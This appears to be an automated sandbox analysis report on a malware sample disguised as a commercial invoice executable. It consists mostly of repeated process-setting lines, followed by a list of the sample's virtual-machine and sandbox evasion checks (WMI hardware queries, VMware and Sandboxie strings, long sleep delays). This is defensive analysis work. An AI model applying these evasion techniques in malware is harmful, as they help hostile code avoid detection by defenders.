                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: COMMERCIAL INVOICE - BL - AWB 7032805642.exe PID: 3648, type: MEMORYSTR
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeMemory allocated: 19863B70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeMemory allocated: 1987D6E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2940000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2BF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2940000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7529Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1989Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: Amcache.hve.8.drBinary or memory string: VMware
                      Source: Amcache.hve.8.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.8.drBinary or memory string: VMware, Inc.
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: Amcache.hve.8.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.8.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.8.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.8.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.8.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: Amcache.hve.8.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                      Source: Amcache.hve.8.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
